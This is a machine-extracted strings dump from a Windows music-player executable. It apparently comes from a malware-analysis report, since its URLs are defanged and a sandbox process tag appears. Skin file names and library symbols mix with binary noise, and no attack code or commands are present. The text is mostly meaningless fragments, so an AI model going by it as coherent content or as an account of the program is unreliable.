.?AV?$sp_counted_impl_p@U?$grammar_helper@U?$grammar@U?$json_grammar@V?$basic_ptree@V?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@V12@U?$less@V?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@2@@property_tree@boost@@@json_parser@property_tree@boost@@U?$parser_context@Unil_t@classic@spirit@boost@@@classic@spirit@4@@classic@spirit@boost@@U?$json_grammar@V?$basic_ptree@V?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@V12@U?$less@V?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@2@@property_tree@boost@@@json_parser@property_tree@4@V?$scanner@V?$_Vector_iterator@V?$_Vector_val@_WV?$allocator@_W@std@@@std@@@std@@U?$scanner_policies@V?$skip_parser_iteration_policy@U?$alternative@U?$alternative@Uspace_parser@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@U?$alternative@Ueol_parser@classic@spirit@boost@@Uend_parser@234@@234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@V1234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@Uiteration_policy@234@@classic@spirit@boost@@Umatch_policy@234@Uaction_policy@234@@classic@spirit@boost@@@234@@impl@classic@spirit@boost@@@detail@boost@@
%Program Files%\yyfm0529\2014081705\yymusic05.exe
%Program Files%\yyfm0529\2014081705\yymusic05.exe
fiTXtXML:com.adobe.xmp
fiTXtXML:com.adobe.xmp
" id="W5M0MpCehiHzreSzNTczkc9d"?>
" id="W5M0MpCehiHzreSzNTczkc9d"?>
#%DSZ
#%DSZ
k/.ea"#>Nn
k/.ea"#>Nn
W%u3>C
W%u3>C
f9Ky.RW`
f9Ky.RW`
125x125.jpg
125x125.jpg
L.Xkj
L.Xkj
320x225.png
320x225.png
astop.png}W
astop.png}W
back.png
back.png
bg2.png}SOh
bg2.png}SOh
bg3.png
bg3.png
bg_2.png}S]H
bg_2.png}S]H
bk.png|
bk.png|
I[CsS%SC
I[CsS%SC
.qO9M
.qO9M
t%7UfEa
t%7UfEa
zC%f
zC%f
]#%Sj
]#%Sj
J%XDU@}T
J%XDU@}T
8i.aV;
8i.aV;
%fiHZZ9
%fiHZZ9
3Nv%F
3Nv%F
R%cV}V
R%cV}V
mD%SK'l9
mD%SK'l9
QC
QC
bkcolor_1.png
bkcolor_1.png
bkcolor_2.png
bkcolor_2.png
bkcolor_3.png
bkcolor_3.png
bkcolor_4.png
bkcolor_4.png
bkcolor_5.png
bkcolor_5.png
bkcolor_6.png
bkcolor_6.png
bkcolor_7.png
bkcolor_7.png
border.png
border.png
L9q
L9q
btn-anonymity.png}
btn-anonymity.png}
[).XF
[).XF
'q.CAqK
'q.CAqK
btn-delete.png
btn-delete.png
btn-fav.png}Wy8
btn-fav.png}Wy8
btn-login.png}
btn-login.png}
btn-login2.png
btn-login2.png
[%*,\4>66
[%*,\4>66
%S;&DN
%S;&DN
btn-next.png
btn-next.png
btn-pause.png}X
btn-pause.png}X
btn-play.png
btn-play.png
BtnHidePlayList.png
BtnHidePlayList.png
BtnRightTop.png
BtnRightTop.png
btn_9k.png}Wy8
btn_9k.png}Wy8
btn_bd.png}Xy8
btn_bd.png}Xy8
btn_close.png}Vy8
btn_close.png}Vy8
btn_comm.png
btn_comm.png
btn_db.png}W
btn_db.png}W
btn_fh.png}XwT
btn_fh.png}XwT
btn_kw.png}
btn_kw.png}
btn_ok.png}W
btn_ok.png}W
l[O{#. %x
l[O{#. %x
btn_ok_blue.png
btn_ok_blue.png
btn_ok_red.png}
btn_ok_red.png}
btn_sc.png
btn_sc.png
=%uIS
=%uIS
btn_xm.png}X
btn_xm.png}X
button.png
button.png
channel.png
channel.png
close.png
close.png
collection.png
collection.png
ðxEuJxg
ðxEuJxg
color_list_bk.png
color_list_bk.png
\dl
\dl
dash.png}SM
dash.png}SM
DefaultUserImage.jpg
DefaultUserImage.jpg
%S]wF
%S]wF
downd.png
downd.png
downda.png
downda.png
downdahover.png
downdahover.png
DownLoadProgressForeImage.png
DownLoadProgressForeImage.png
exit.png}U
exit.png}U
fbcaptionbk.png
fbcaptionbk.png
feedback.png}V
feedback.png}V
>/.Yhi
>/.Yhi
font_bkcolor.png
font_bkcolor.png
font_forecolor.png
font_forecolor.png
forecolor_1.png
forecolor_1.png
forecolor_2.png
forecolor_2.png
forecolor_3.png
forecolor_3.png
forecolor_4.png
forecolor_4.png
.IDATx
.IDATx
forecolor_5.png
forecolor_5.png
forecolor_6.png
forecolor_6.png
forecolor_7.png
forecolor_7.png
forgettt.jpg
forgettt.jpg
frmdownmenu.xml
frmdownmenu.xml
FrmDropDownMenuFrame.xml
FrmDropDownMenuFrame.xml
FrmFeedBack.xmle
FrmFeedBack.xmle
FrmHotKeyTip.xmlu
FrmHotKeyTip.xmlu
frmlogin.xml
frmlogin.xml
FrmLrcChild.xmlU
FrmLrcChild.xmlU
FrmMenuFrame.xml
FrmMenuFrame.xml
frmplayer.xml
frmplayer.xml
frmplaylist.xml
frmplaylist.xml
frmProgressToolTip.xmlUPKN
frmProgressToolTip.xmlUPKN
frmWebBrowser.xml=
frmWebBrowser.xml=
frmWindowLrc.xml%M1
frmWindowLrc.xml%M1
frmWindowLrcParent.xml%
frmWindowLrcParent.xml%
headimg.png}
headimg.png}
d%U(.6
d%U(.6
tG%C*
tG%C*
history.png
history.png
home.png}VgTS
home.png}VgTS
hotkeytipbk.png
hotkeytipbk.png
icon.png
icon.png
input-password.png}U
input-password.png}U
input-user.png
input-user.png
like.png
like.png
!\Un%x
!\Un%x
list.png
list.png
lista.png
lista.png
D-wjÓ
D-wjÓ
listahover.png
listahover.png
list_item_bg.png}S
list_item_bg.png}S
list_pause.png
list_pause.png
list_play.png
list_play.png
list_scroll_bar.png}SmH
list_scroll_bar.png}SmH
list_scroll_bar2.png}S_H
list_scroll_bar2.png}S_H
{òC
{òC
list_title_bg.png}S
list_title_bg.png}S
loading01.png
loading01.png
loading02.png
loading02.png
loading03.png
loading03.png
loading04.png
loading04.png
LoginBk.png
LoginBk.png
%S%hu.Y
%S%hu.Y
g).IQ
g).IQ
LrcBk.png
LrcBk.png
u-3H}.
u-3H}.
lrclist.png}Xy8
lrclist.png}Xy8
@.xn?
@.xn?
lyricdelete.png
lyricdelete.png
lyricdeletea.png
lyricdeletea.png
lyricdeletea2.png
lyricdeletea2.png
LyricFrameVoice.png
LyricFrameVoice.png
lyricmute.png
lyricmute.png
lyrictoplay.png
lyrictoplay.png
mainframeshadow.png
mainframeshadow.png
3.jUj
3.jUj
max.png
max.png
menu.png
menu.png
min.png}SOh
min.png}SOh
mine.png
mine.png
minea.png
minea.png
mineahover.png
mineahover.png
mini.png
mini.png
mE)iVA.nP
mE)iVA.nP
more.png}SOH
more.png}SOH
musiclibrary.png
musiclibrary.png
next.png}ViTSg
next.png}ViTSg
next0520.png
next0520.png
normalVolume.png}U
normalVolume.png}U
%DZRlj
%DZRlj
play0520.png
play0520.png
play2.png
play2.png
playerbg01.png
playerbg01.png
playerbg02.png
playerbg02.png
playerlist.png}X
playerlist.png}X
playersidebg.jpg
playersidebg.jpg
playinging.jpg
playinging.jpg
playinginga.jpg
playinginga.jpg
".Wlm
".Wlm
playingnext.png
playingnext.png
playingplaying.jpg
playingplaying.jpg
playingprev.jpg
playingprev.jpg
playingpreva.jpg
playingpreva.jpg
playingrandom.jpg
playingrandom.jpg
playingrandoma.jpg
playingrandoma.jpg
playingvoice.png}V
playingvoice.png}V
PlayProgressForeImage.png
PlayProgressForeImage.png
pl_back.png}S_h
pl_back.png}S_h
pl_bg.png
pl_bg.png
pl_big.png
pl_big.png
pl_btn_down.png}Tih
pl_btn_down.png}Tih
pl_btn_on.png
pl_btn_on.png
pl_close.png}S[H
pl_close.png}S[H
pl_color.png
pl_color.png
pl_desktop.png
pl_desktop.png
pl_feedback.png}SKL
pl_feedback.png}SKL
pl_forward.png}S_H
pl_forward.png}S_H
pl_icon.png}Wy8
pl_icon.png}Wy8
pl_itself.png
pl_itself.png
pl_mutevol.png
pl_mutevol.png
pl_next.png}S_h
pl_next.png}S_h
pl_pause.png}SKh
pl_pause.png}SKh
pl_prev.png
pl_prev.png
pl_res.png
pl_res.png
pl_set.png
pl_set.png
pl_small.png}Tmh
pl_small.png}Tmh
pl_split.png}S_h
pl_split.png}S_h
pl_vol.png
pl_vol.png
pop_bkimage.png}U
pop_bkimage.png}U
power.png}XgTS
power.png}XgTS
,&.,/!./*
,&.,/!./*
prev.png}ViTS
prev.png}ViTS
prev0520.png
prev0520.png
prevention.png
prevention.png
progresstooltip.png
progresstooltip.png
progresstooltipbk.png
progresstooltipbk.png
.ZfDrhe
.ZfDrhe
T%s61K
T%s61K
m;.rA
m;.rA
progress_fore.png
progress_fore.png
pushedVolume.png
pushedVolume.png
random.jpg
random.jpg
random01.jpg
random01.jpg
random01a.jpg
random01a.jpg
random01hover.jpg
random01hover.jpg
random02.jpg
random02.jpg
random02a.jpg
random02a.jpg
random02hover.jpg
random02hover.jpg
random03.jpg
random03.jpg
random03a.jpg
random03a.jpg
random03hover.jpg
random03hover.jpg
random0520.png
random0520.png
reflash.png
reflash.png
remembertt.jpg
remembertt.jpg
scrollbar.png
scrollbar.png
search.png
search.png
E.Eg/&
E.Eg/&
SelectColor_SliderBar_Thumb.png
SelectColor_SliderBar_Thumb.png
5).uZ
5).uZ
slider_bg.png
slider_bg.png
sound (2).jpg
sound (2).jpg
sound.jpg
sound.jpg
sound100.jpg
sound100.jpg
steup.png}
steup.png}
suspensionbig.png
suspensionbig.png
suspensionbiga.png
suspensionbiga.png
suspensionbigahover.png
suspensionbigahover.png
suspensionclose.png
suspensionclose.png
suspensionclosea.png
suspensionclosea.png
suspensioncloseahover.png
suspensioncloseahover.png
suspensionfeedback.png
suspensionfeedback.png
suspensionfeedbacka.png
suspensionfeedbacka.png
suspensionfeedbackahover.png
suspensionfeedbackahover.png
suspensionlogin.png
suspensionlogin.png
suspensionmin.png
suspensionmin.png
suspensionmina.png
suspensionmina.png
suspensionminahover.png
suspensionminahover.png
suspensionset.png
suspensionset.png
suspensionseta.png
suspensionseta.png
suspensionsetahover.png
suspensionsetahover.png
suspensiontop.png
suspensiontop.png
suspensiontopa.png
suspensiontopa.png
suspensiontopahover.png
suspensiontopahover.png
system_menu_btnexit.png
system_menu_btnexit.png
system_menu_btnfeedback.png}V
system_menu_btnfeedback.png}V
system_menu_btnmin.png
system_menu_btnmin.png
;7%2uf
;7%2uf
system_menu_btnmini.png
system_menu_btnmini.png
system_menu_btnsteup.png}
system_menu_btnsteup.png}
system_menu_btntop.png}W
system_menu_btntop.png}W
sys_check_btn.png
sys_check_btn.png
sys_check_btn_blue.png
sys_check_btn_blue.png
sys_check_btn_red.png
sys_check_btn_red.png
sys_check_btn_whiter.png
sys_check_btn_whiter.png
tab_comm.png
tab_comm.png
tooltipbk.png
tooltipbk.png
update.xml
update.xml
voice00528.png
voice00528.png
voice0520.png
voice0520.png
voice0a0528.png
voice0a0528.png
voice1000528.png
voice1000528.png
voiceall0528.png
voiceall0528.png
astop.png
astop.png
bg2.png
bg2.png
bg_2.png
bg_2.png
bk.png
bk.png
btn-anonymity.png
btn-anonymity.png
btn-fav.png
btn-fav.png
btn-login.png
btn-login.png
btn-pause.png
btn-pause.png
btn_9k.png
btn_9k.png
btn_bd.png
btn_bd.png
btn_close.png
btn_close.png
btn_db.png
btn_db.png
btn_fh.png
btn_fh.png
btn_kw.png
btn_kw.png
btn_ok.png
btn_ok.png
btn_ok_red.png
btn_ok_red.png
btn_xm.png
btn_xm.png
dash.png
dash.png
exit.png
exit.png
feedback.png
feedback.png
frmProgressToolTip.xml
frmProgressToolTip.xml
frmWebBrowser.xml
frmWebBrowser.xml
headimg.png
headimg.png
home.png
home.png
input-password.png
input-password.png
list_item_bg.png
list_item_bg.png
list_scroll_bar.png
list_scroll_bar.png
list_scroll_bar2.png
list_scroll_bar2.png
list_title_bg.png
list_title_bg.png
lrclist.png
lrclist.png
min.png
min.png
more.png
more.png
next.png
next.png
normalVolume.png
normalVolume.png
playerlist.png
playerlist.png
playingvoice.png
playingvoice.png
pl_back.png
pl_back.png
pl_btn_down.png
pl_btn_down.png
pl_close.png
pl_close.png
pl_feedback.png
pl_feedback.png
pl_forward.png
pl_forward.png
pl_icon.png
pl_icon.png
pl_next.png
pl_next.png
pl_small.png
pl_small.png
pl_split.png
pl_split.png
pop_bkimage.png
pop_bkimage.png
power.png
power.png
prev.png
prev.png
steup.png
steup.png
system_menu_btnfeedback.png
system_menu_btnfeedback.png
system_menu_btnsteup.png
system_menu_btnsteup.png
system_menu_btntop.png
system_menu_btntop.png
.Zuxf
.Zuxf
tCPS
tCPS
$;y)#%s
$;y)#%s
.QsvC
.QsvC
.VvC v
.VvC v
lH)Qk%c
lH)Qk%c
4n.Ei
4n.Ei
,GA.GS
,GA.GS
55
55
6 6$6(6,6
6 6$6(6,6
7(7.787?7
7(7.787?7
> >'>.>5>]>
> >'>.>5>]>
0%0U0
0%0U0
5$5(5,5054585
5$5(5,5054585
3M4
3M4
? ?$?(?,?0?4?8?
? ?$?(?,?0?4?8?
7-7R7}7
7-7R7}7
> >$>(>,>0>4>8>
> >$>(>,>0>4>8>
4 4$4(4,4044484
4 4$4(4,4044484
6 6$6(6,60646
6 6$6(6,60646
8 8$8(8,80848
8 8$8(8,80848
3 3$3(3,3034383
3 3$3(3,3034383
? ?$?(?,?0?4?8?@?
? ?$?(?,?0?4?8?@?
3 3$3(3,3034383
3 3$3(3,3034383
: :@:`:|:
: :@:`:|:
=$=,=4=
=$=,=4=
4 5$5(545
4 5$5(545
mscoree.dll
mscoree.dll
LKERNEL32.DLL
LKERNEL32.DLL
- Attempt to initialize the CRT more than once.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- CRT not initialized
- floating point support not loaded
- floating point support not loaded
WUSER32.DLL
WUSER32.DLL
Skin\bkcolor_1.png
Skin\bkcolor_1.png
Skin\forecolor_1.png
Skin\forecolor_1.png
Skin\bkcolor_2.png
Skin\bkcolor_2.png
Skin\forecolor_2.png
Skin\forecolor_2.png
Skin\bkcolor_3.png
Skin\bkcolor_3.png
Skin\forecolor_3.png
Skin\forecolor_3.png
Skin\bkcolor_4.png
Skin\bkcolor_4.png
Skin\forecolor_4.png
Skin\forecolor_4.png
Skin\bkcolor_5.png
Skin\bkcolor_5.png
Skin\forecolor_5.png
Skin\forecolor_5.png
Skin\bkcolor_6.png
Skin\bkcolor_6.png
Skin\forecolor_6.png
Skin\forecolor_6.png
Skin\bkcolor_7.png
Skin\bkcolor_7.png
Skin\forecolor_7.png
Skin\forecolor_7.png
E:\zhuyicheng\boost_1_53_0\boost/property_tree/detail/rapidxml.hpp
E:\zhuyicheng\boost_1_53_0\boost/property_tree/detail/rapidxml.hpp
E:\zhuyicheng\boost_1_53_0\boost/optional/optional.hpp
E:\zhuyicheng\boost_1_53_0\boost/optional/optional.hpp
!p.empty() && "Empty path not allowed for put_child."
!p.empty() && "Empty path not allowed for put_child."
errorUrl
errorUrl
E:\zhuyicheng\svn\trunk\MusicPlayerSrc\win32\MusicPlayer\Header Files\rapidxml/rapidxml.hpp
E:\zhuyicheng\svn\trunk\MusicPlayerSrc\win32\MusicPlayer\Header Files\rapidxml/rapidxml.hpp
E:\zhuyicheng\svn\trunk\MusicPlayerSrc\win32\MusicPlayer\Header Files\rapidxml/rapidxml_print.hpp
E:\zhuyicheng\svn\trunk\MusicPlayerSrc\win32\MusicPlayer\Header Files\rapidxml/rapidxml_print.hpp
E:\zhuyicheng\boost_1_53_0\boost/smart_ptr/shared_ptr.hpp
E:\zhuyicheng\boost_1_53_0\boost/smart_ptr/shared_ptr.hpp
E:\zhuyicheng\boost_1_53_0\boost/smart_ptr/scoped_ptr.hpp
E:\zhuyicheng\boost_1_53_0\boost/smart_ptr/scoped_ptr.hpp
E:\zhuyicheng\boost_1_53_0\boost/spirit/home/classic/core/impl/match.ipp
E:\zhuyicheng\boost_1_53_0\boost/spirit/home/classic/core/impl/match.ipp
val.is_initialized()
val.is_initialized()
E:\zhuyicheng\boost_1_53_0\boost/spirit/home/classic/core/match.hpp
E:\zhuyicheng\boost_1_53_0\boost/spirit/home/classic/core/match.hpp
c.stack.size() >= 1
c.stack.size() >= 1
Song.music_id
Song.music_id
Song.artid
Song.artid
Song.name
Song.name
Song.artist
Song.artist
Song.special
Song.special
Song.artist_pic240
Song.artist_pic240
Song.mp3path
Song.mp3path
Song.mp3dl
Song.mp3dl
hXXp://
hXXp://
=data.xcode
=data.xcode
data.songList
data.songList
E:\zhuyicheng\boost_1_53_0\boost/spirit/home/classic/utility/impl/chset/range_run.ipp
E:\zhuyicheng\boost_1_53_0\boost/spirit/home/classic/utility/impl/chset/range_run.ipp
r.is_valid()
r.is_valid()
tplayList.trackList
tplayList.trackList
Assertion failed: %s, file %s, line %d
Assertion failed: %s, file %s, line %d
1.14.529.1
1.14.529.1
MusicPla.exe
MusicPla.exe
YFMSever.exe_2388:
.idata
.idata
.rdata
.rdata
`.rsrc
`.rsrc
kernel32.dll
kernel32.dll
Windows
Windows
MSWHEEL_ROLLMSG
MSWHEEL_ROLLMSG
MSH_WHEELSUPPORT_MSG
MSH_WHEELSUPPORT_MSG
MSH_SCROLL_LINES_MSG
MSH_SCROLL_LINES_MSG
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
oleaut32.dll
oleaut32.dll
EVariantBadIndexError
EVariantBadIndexError
ssShift
ssShift
htKeyword
htKeyword
EInvalidOperation
EInvalidOperation
u%CNu
u%CNu
%s[%d]
%s[%d]
%s_%d
%s_%d
EInvalidGraphicOperation
EInvalidGraphicOperation
Uh.FB
Uh.FB
USER32.DLL
USER32.DLL
comctl32.dll
comctl32.dll
uxtheme.dll
uxtheme.dll
OnKeyDown
OnKeyDown
OnKeyPress
OnKeyPress
OnKeyUp
OnKeyUp
UrlMon
UrlMon
Proportional
Proportional
%s%s%s%s%s%s%s%s%s%s
%s%s%s%s%s%s%s%s%s%s
IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")
IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")
JumpID("","%s")
JumpID("","%s")
TKeyEvent
TKeyEvent
TKeyPressEvent
TKeyPressEvent
HelpKeywordteA
HelpKeywordteA
crSQLWait
crSQLWait
%s (%s)
%s (%s)
imm32.dll
imm32.dll
AutoHotkeys
AutoHotkeys
AutoHotkeys8~D
AutoHotkeys8~D
ssHotTrack
ssHotTrack
TWindowState
TWindowState
poProportional
poProportional
TWMKey
TWMKey
KeyPreview
KeyPreview
WindowState
WindowState
tagMSG
tagMSG
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
vcltest3.dll
vcltest3.dll
User32.dll
User32.dll
%s, ClassID: %s
%s, ClassID: %s
ole32.dll
ole32.dll
olepro32.dll
olepro32.dll
getservbyport
getservbyport
WSAAsyncGetServByPort
WSAAsyncGetServByPort
WSAJoinLeaf
WSAJoinLeaf
WS2_32.DLL
WS2_32.DLL
127.0.0.1
127.0.0.1
Uh.AF
Uh.AF
TIdSocketListWindows
TIdSocketListWindows
TIdStackWindowsU
TIdStackWindowsU
IdStackWindows
IdStackWindows
%s, %.2d %s %.4d %s %s
%s, %.2d %s %.4d %s %s
%s, %d %s %d %s %s
%s, %d %s %d %s %s
ftpTransfer
ftpTransfer
ftpReady
ftpReady
ftpAborted
ftpAborted
ClientPortMin
ClientPortMin
ClientPortMax
ClientPortMax
Port
Port
EIdCanNotBindPortInRange
EIdCanNotBindPortInRange
EIdInvalidPortRangeSVW
EIdInvalidPortRangeSVW
saUsernamePassword
saUsernamePassword
Password
Password
0.0.0.1
0.0.0.1
TIdTCPConnection
TIdTCPConnection
TIdTCPConnection0
TIdTCPConnection0
IdTCPConnection
IdTCPConnection
EIdTCPConnectionError
EIdTCPConnectionError
TIdTCPClient
TIdTCPClient
IdTCPClient
IdTCPClient
BoundPort
BoundPort
PortU
PortU
password
password
Password
Password
IdHTTPHeaderInfo
IdHTTPHeaderInfo
ProxyPassword
ProxyPassword
ProxyPort
ProxyPort
Mozilla/3.0 (compatible; Indy Library)
Mozilla/3.0 (compatible; Indy Library)
libeay32.dll
libeay32.dll
ssleay32.dll
ssleay32.dll
SSL_CTX_use_PrivateKey_file
SSL_CTX_use_PrivateKey_file
SSL_CTX_use_certificate_file
SSL_CTX_use_certificate_file
SSL_get_peer_certificate
SSL_get_peer_certificate
SSL_CTX_set_default_passwd_cb
SSL_CTX_set_default_passwd_cb
SSL_CTX_set_default_passwd_cb_userdata
SSL_CTX_set_default_passwd_cb_userdata
SSL_CTX_check_private_key
SSL_CTX_check_private_key
X509_STORE_CTX_get_current_cert
X509_STORE_CTX_get_current_cert
des_set_key
des_set_key
sslvrfFailIfNoPeerCert
sslvrfFailIfNoPeerCert
TPasswordEvent
TPasswordEvent
Certificate
Certificate
RootCertFile,}@
RootCertFile,}@
CertFile,}@
CertFile,}@
KeyFile
KeyFile
OnGetPasswordTGG
OnGetPasswordTGG
EIdOSSLLoadingRootCertError
EIdOSSLLoadingRootCertError
EIdOSSLLoadingCertError
EIdOSSLLoadingCertError
EIdOSSLLoadingKeyError
EIdOSSLLoadingKeyError
CommentURL
CommentURL
TIdHTTPMethod
TIdHTTPMethod
IdHTTP
IdHTTP
TIdHTTPOption
TIdHTTPOption
TIdHTTPOptions
TIdHTTPOptions
TIdHTTPProtocolVersion
TIdHTTPProtocolVersion
IdHTTPx
IdHTTPx
TIdHTTPOnHeadersAvailable
TIdHTTPOnHeadersAvailable
TIdHTTPOnRedirectEvent
TIdHTTPOnRedirectEvent
TIdHTTPResponse
TIdHTTPResponse
TIdHTTPRequest
TIdHTTPRequest
TIdHTTPRequestd
TIdHTTPRequestd
TIdHTTPProtocolx
TIdHTTPProtocolx
TIdCustomHTTP
TIdCustomHTTP
TIdCustomHTTPx
TIdCustomHTTPx
TIdHTTP`
TIdHTTP`
TIdHTTP
TIdHTTP
HTTPOptionst
HTTPOptionst
EIdHTTPProtocolException
EIdHTTPProtocolException
HTTPS
HTTPS
https
https
This request method is supported in HTTP 1.1
This request method is supported in HTTP 1.1
HTTP/1.0 200 OK
HTTP/1.0 200 OK
HTTP/
HTTP/
grfKeyState
grfKeyState
TComTargetExecEvent
TComTargetExecEvent
CmdGroup
CmdGroup
nCmdID
nCmdID
nCmdexecopt
nCmdexecopt
hhctrl.ocx
hhctrl.ocx
URLMON.DLL
URLMON.DLL
SHDOCLC.DLL
SHDOCLC.DLL
IWebBrowser
IWebBrowser
IWebBrowserApph
IWebBrowserApph
IWebBrowser2
IWebBrowser2
TEWBWindowSetResizable
TEWBWindowSetResizable
TEWBWindowSetLeft
TEWBWindowSetLeft
TEWBWindowSetTop
TEWBWindowSetTop
TEWBWindowSetWidth
TEWBWindowSetWidth
TEWBWindowSetHeight
TEWBWindowSetHeight
bstrUrlContext
bstrUrlContext
bstrUrl
bstrUrl
OnWindowSetResizable
OnWindowSetResizable
OnWindowSetLeft
OnWindowSetLeft
OnWindowSetTopT
OnWindowSetTopT
OnWindowSetWidth
OnWindowSetWidth
OnWindowSetHeight
OnWindowSetHeight
rcmDefault
rcmDefault
rcmDebug
rcmDebug
DontExecuteScripts
DontExecuteScripts
DontExecuteJava
DontExecuteJava
DontExecuteActiveX
DontExecuteActiveX
DisableUrlIfEncodingUTF8
DisableUrlIfEncodingUTF8
EnableUrlIfEncodingUTF8
EnableUrlIfEncodingUTF8
CheckFontSupportsCodePage
CheckFontSupportsCodePage
DisableSubmitUrlInUTF8
DisableSubmitUrlInUTF8
EnableSubmitUrlInUTF8
EnableSubmitUrlInUTF8
lpMsg
lpMsg
PMsg
PMsg
pguidCmdGroup
pguidCmdGroup
TTranslateUrlEvent
TTranslateUrlEvent
pchURLIn
pchURLIn
ppchURLOut
ppchURLOut
CmdID
CmdID
pszUrl
pszUrl
pszUrlContext
pszUrlContext
szPassWord
szPassWord
ErrorUrl
ErrorUrl
OptionKeyPath
OptionKeyPath
OverrideOptionKeyPath`
OverrideOptionKeyPath`
OnTranslateUrl
OnTranslateUrl
OnCommandExec
OnCommandExec
'%s' is not supported.
'%s' is not supported.
WebocPopupManagement
WebocPopupManagement
ValidateNavigateUrl
ValidateNavigateUrl
HttpUsernamePasswordDisable
HttpUsernamePasswordDisable
GetUrlDomFilePathUnencoded
GetUrlDomFilePathUnencoded
XmlHttp
XmlHttp
MAPI32.DLL
MAPI32.DLL
PTF://
PTF://
hXXp://
hXXp://
hXXps://
hXXps://
AppEvents\Schemes\Apps\Explorer\Navigating\.Current
AppEvents\Schemes\Apps\Explorer\Navigating\.Current
.Current
.Current
\ieframe.dll
\ieframe.dll
\shdocvw.dll
\shdocvw.dll
\StringFileInfo\%0.4x%0.4x\%s
\StringFileInfo\%0.4x%0.4x\%s
TMsgEvent
TMsgEvent
TKeyEventEx
TKeyEventEx
Bypass
Bypass
poPortrait
poPortrait
OnKeyDown
OnKeyDown
0.750000
0.750000
3333333
3333333
\Software\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent
\Software\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent
\Software\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent\Post Platform
\Software\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent\Post Platform
User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)(
User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)(
EmbeddedWB hXXp://bsalsa.com/
EmbeddedWB hXXp://bsalsa.com/
TFileOperation
TFileOperation
FileOperation
FileOperation
OnActionExecute
OnActionExecute
SysConfig.ini
SysConfig.ini
WJHTTP
WJHTTP
%d.%d
%d.%d
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
0123456789
0123456789
DSound.dll
DSound.dll
Winmm.dll
Winmm.dll
Data\User2.ini
Data\User2.ini
88888888
88888888
Update.zip
Update.zip
00000000
00000000
YYMusic05.exe
YYMusic05.exe
DMSet.Xml
DMSet.Xml
/DM11/DMSet.Xml
/DM11/DMSet.Xml
hXXp://VVV.baidu.com
hXXp://VVV.baidu.com
hXXp://update.yinyue.fm
hXXp://update.yinyue.fm
8888-88-88
8888-88-88
PlayerUpdate.exe
PlayerUpdate.exe
0000-00-00
0000-00-00
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\
[(*&^%$#@!)]
[(*&^%$#@!)]
?456789:;
?456789:;
!"#$%&'()* ,-./0123
!"#$%&'()* ,-./0123
Nv.QbD
Nv.QbD
{Z|.qktg
{Z|.qktg
)sVk.eU
)sVk.eU
?:4.al\u
?:4.al\u
ac.Rp
ac.Rp
U%U,f
U%U,f
ù%"
ù%"
6QZ.kkE!^\
6QZ.kkE!^\
.Cee,Wm
.Cee,Wm
AKLRUXZZjjjjjjjjmjjZZXURLK"
AKLRUXZZjjjjjjjjmjjZZXURLK"
%S_dikkggggk
%S_dikkggggk
%Uagkk`F9?nA>H^
%Uagkk`F9?nA>H^
333333333333333333
333333333333333333
33333833
33333833
3333339
3333339
3333333333333338
3333333333333338
:*"*"$3338
:*"*"$3338
33333333
33333333
33333333333
33333333333
3333333333338
3333333333338
33338?383
33338?383
333333333333
333333333333
:*3:"$3338
:*3:"$3338
333333333333333
333333333333333
@4(@4(@4(@4(@4(@4(@4(@4(@4(@4(@4(@4(
@4(@4(@4(@4(@4(@4(@4(@4(@4(@4(@4(@4(
@4(@4(@4(@4(@4(@4(@4(@4(@4(@4(@4(
@4(@4(@4(@4(@4(@4(@4(@4(@4(@4(@4(
=4'=4'=4'=4'=4'=4'=4'=4'=4'=4'=4'
=4'=4'=4'=4'=4'=4'=4'=4'=4'=4'=4'
=4'=4'=4'=4'=4'=4'=4'=4'=4'=4'
=4'=4'=4'=4'=4'=4'=4'=4'=4'=4'
@4(@4(@4(@4(@4(@4(=4'=4'=4'=4'=4'
@4(@4(@4(@4(@4(@4(=4'=4'=4'=4'=4'
=4'=4'=4'=4'=4'
=4'=4'=4'=4'=4'
peWO@0RD.NA1
peWO@0RD.NA1
N?/N?/N?/N?/N?/N?/N?/N?/N?/O?.N?/M>.PA1
N?/N?/N?/N?/N?/N?/N?/N?/N?/O?.N?/M>.PA1
NA1PA.OA/
NA1PA.OA/
